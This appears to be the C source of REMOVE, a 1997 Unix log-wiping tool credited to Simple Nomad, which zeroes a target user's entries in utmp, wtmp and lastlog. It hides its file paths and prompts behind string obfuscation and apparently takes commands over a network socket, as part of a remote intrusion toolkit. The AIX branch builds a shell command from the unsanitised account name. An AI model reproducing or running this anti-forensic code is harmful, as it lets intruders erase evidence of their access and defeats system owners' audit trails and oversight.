/*
REMOVE       -- February 26, 1997
Simple Nomad -- Nomad Mobile Research Centre

Universal utmp, wtmp, and lastlog editor. Actually 
removes, doesn't leave holes...

*/

#include <stdio.h>
#include <utmp.h>
#include <sys/types.h>
#include <unistd.h>
#include <fcntl.h>
#ifndef AIX
#include <lastlog.h>
#else
#include <login.h>
#endif
#include <pwd.h>
#include "strhide.h"

#ifdef AIX
#define WTMP      "-?B<P(WXP-3Q^)B4\\(0``"       /* /var/adm/wtmp */
#define UTMP      ")?C0E,GXD)3PA    "            /* /etc/utmp */
#define LASTLOG   "5?C0E,GXB-#(D(S@E*'X],\"(E/3XV"
                                                 /* /etc/security/lastlog */
                                             /* Not a binary file in AIX, so */
                                             /* handled a bit differently.   */
char LogParam[7][30]=
{
  "time_last_login=","tty_last_login=","host_last_login=",
  "unsuccessful_login_count=","time_last_unsuccessful_login=",
  "tty_last_unsuccessful_login=","host_last_unsuccessful_login="
};
#endif
#ifdef GENERIC
#define WTMP        "-?B<P(WXP-3Q^)B4\\(0``"     /* /var/adm/wtmp */
#define UTMP        "-?B<P(WXP-3Q^)\"4\\(0``"    /* /var/adm/utmp */
#define LASTLOG     "0?B<P(WXP-3Q^/3`B)3T^-@``"  /* /var/adm/lastlog */
#endif


int	transfer_socket;
char	buf[4096];

int removeit(char *cTarget)
{
  int cleanWtmp(char *,int);
  int cleanUtmp(char *,int);
  int cleanLastlog(char *);
  int getCount(char *,char *);
  char line[10];
  int killem, firstcnt, t, n;

  firstcnt=getCount(SHD(WTMP),cTarget); /* Get an initial count */
  sprintf(buf,"\n%s\n%s\n\n", SHD("6`Q0<'@<4<3,H<0(X/\"$]-'$?/CPP-0``"), SHD("E'SX\\,#5Q'#XS.#TT<0,T(C0P(S(Y<1(T/R4C-'%Y,GAQ8&AH9@``"));
  write(transfer_socket, buf, strlen(buf));
  sprintf(buf,"Found %d record(s) for user %s\n",firstcnt,cTarget);
  write(transfer_socket, buf, strlen(buf));
  sprintf(buf,"%s\n\n", SHD("J!C@]/7$P)24T/\"$E<3!Q/3`B)3T^-G$R/30P/R0A<3,H<34T-S`D/25_"));
  write(transfer_socket, buf, strlen(buf));
  sprintf(buf,"%s\n", SHD("K<G%Q<7%\\<2,T/#XG-'$],\"(E<7)Q(S0R/B,U(G$W(SX\\<20E/\"%^)B4\\(0``"));
  write(transfer_socket, buf, strlen(buf));
  sprintf(buf,"%s\n", SHD("J,'%Q<7%\\<2,T/#XG-'%Y,'@]/7$C-#(^(S4B<3<C/CQQ)\"4\\(7XF)3PA"));
  write(transfer_socket, buf, strlen(buf));
  sprintf(buf,"%s\n\n", SHD("5('%Q<7%\\<7D@>\"0X)7$A(SXV(S`\\"));
  write(transfer_socket, buf, strlen(buf));
  sprintf(buf,"%s", SHD("3%#\\E-\"-Q(C0]-#(E.#X_<7QO<0``"));
  write(transfer_socket, buf, strlen(buf));
  n = read(transfer_socket, line, sizeof(line));
  if(line[n-1] == '\n')
  	line[n-2] = 0;
  if(line[0]==0x51 || line[0]==0x71) return(0);
  if(line[0]==0x41 || line[0]==0x61) killem=firstcnt;
  else killem=atoi(line);
  if (killem>firstcnt)
  {
    sprintf(buf,"%s %d %s %d %s.\n", SHD("1\"#XD<3(P/S\\^)7$U-#TT)30`"), killem, SHD("/(S0R/B,U(G$X-W$^/STH"), firstcnt, SHD("&-\"DX(B5_"));
    write(transfer_socket, buf, strlen(buf));
    return(-1);
  }
  t=cleanWtmp(cTarget,killem); /* Now to clean up utmp and wtmp */
  if (t==1) {
    sprintf(buf,"%s %s.\n", SHD("3!2,^)#,]-'$R/30P/S@_-G$D(0``"), SHD(WTMP));
    write(transfer_socket, buf, strlen(buf));
    return(-1);
  } else
  { sprintf(buf,"%s %d record(s) from %s\n", SHD("*$CTT,#\\T-7$D(0``"),killem, SHD(WTMP));
  write(transfer_socket, buf, strlen(buf));
  }
  t=cleanUtmp(cTarget,killem);
  if (t==1) {
    sprintf(buf,"%s %s.\n", SHD("3!2,^)#,]-'$R/30P/S@_-G$D(0``"), SHD(UTMP));
    write(transfer_socket, buf, strlen(buf));
    return(-1);
  } else
  { sprintf(buf,"%s %d record(s) from %s\n", SHD("*$CTT,#\\T-7$D(0``"),killem,SHD(UTMP));
  write(transfer_socket, buf, strlen(buf));
  }
  t=cleanLastlog(cTarget);    /* Make our attempt at lastlog */
  if (t==1) {
    sprintf(buf,"%s %s.\n", SHD("3!2,^)#,]-'$R/30P/S@_-G$D(0``"), SHD(LASTLOG));
    write(transfer_socket, buf, strlen(buf));
    return(-1);
  }
  sprintf(buf,"%s %s\n", SHD("*$CTT,#\\T-7$D(0``"),SHD(LASTLOG));
  write(transfer_socket, buf, strlen(buf));
} /* end main */

int getCount(fname,acct) /* Go check wtmp and find out how many records */ 
char *fname, *acct;
{
  struct utmp utmp_ent;
  int f,cnt=0;

  if((f=open(fname,O_RDWR))>=0){
    while(read(f,&utmp_ent,sizeof(utmp_ent)))if(!strncmp(utmp_ent.ut_name, acct,strlen(acct)))cnt++;
  }
  close(f);
  return(cnt);
} /* end getCount */

int cleanWtmp(acct,killem)
char *acct;
int killem;
{
  struct utmp utmp_ent;
  int fd,count=0;
  if((fd=open(SHD(WTMP),O_RDWR))>=0){
    while(read(fd,&utmp_ent,sizeof(utmp_ent)))if(!strncmp(utmp_ent.ut_name,acct,strlen(acct)))count++;
    lseek(fd,0,SEEK_SET);
    while(read(fd,&utmp_ent,sizeof(utmp_ent))&&killem){
      if(!strncmp(utmp_ent.ut_name,acct,strlen(acct))){
        count--;
        if(count+1<=killem){
          bzero((char *)&utmp_ent,sizeof(utmp_ent));
          lseek(fd,-(sizeof(utmp_ent)),SEEK_CUR);
          write(fd,&utmp_ent,sizeof(utmp_ent));
          killem--;
        }
      }
    }
    close(fd);
  }
  else return(1);
} /* end cleanWtmp */

int cleanUtmp(acct,killem)
char *acct;
int killem;
{
  struct utmp utmp_ent;
  int fd;
  if((fd=open(SHD(UTMP),O_RDWR))>=0){
    lseek(fd,0,SEEK_SET);
    while(read(fd,&utmp_ent,sizeof(utmp_ent))&&killem){
      if(!strncmp(utmp_ent.ut_name,acct,strlen(acct))){
        if(killem>0){
          bzero((char *)&utmp_ent,sizeof(utmp_ent));
          lseek(fd,-(sizeof(utmp_ent)),SEEK_CUR);
          write(fd,&utmp_ent,sizeof(utmp_ent));
          killem--;
        }
      }
    }
    close(fd);
  }
  else return(1);
} /* end cleanUtmp */

int cleanLastlog(acct) /* The lastlog subroutine */ 
char *acct;
{
#ifdef AIX /* Quite a kludge for AIX, but what the fuck it works */
  int t,i;
  char entry[200];
  for (i=0;i<7;i++)
  {
    sprintf(entry,"%s -f %s -s %s -a %s>/dev/null", SHD("%,CDB-#(`"),SHD(LASTLOG),acct,LogParam[i]);
    t=system(entry);
    sprintf(buf,"Return code for %s is %d\n",LogParam[i],t);
    write(transfer_socket, buf, strlen(buf));
  }
#else  /* Normal binary lastlog cleanup */
  struct passwd *pwd;
  struct lastlog logit;
  int f;
  if((pwd=getpwnam(acct))){
    if((f=open(SHD(LASTLOG),O_RDWR))>=0){
      lseek(f,(long)pwd->pw_uid*sizeof(struct lastlog),0);
      bzero((char *)&logit,sizeof(logit));
      write(f,(char *)&logit,sizeof(logit));
      close(f);
    }
  }
  else return(1);
#endif
} /* end cleanLastlog */
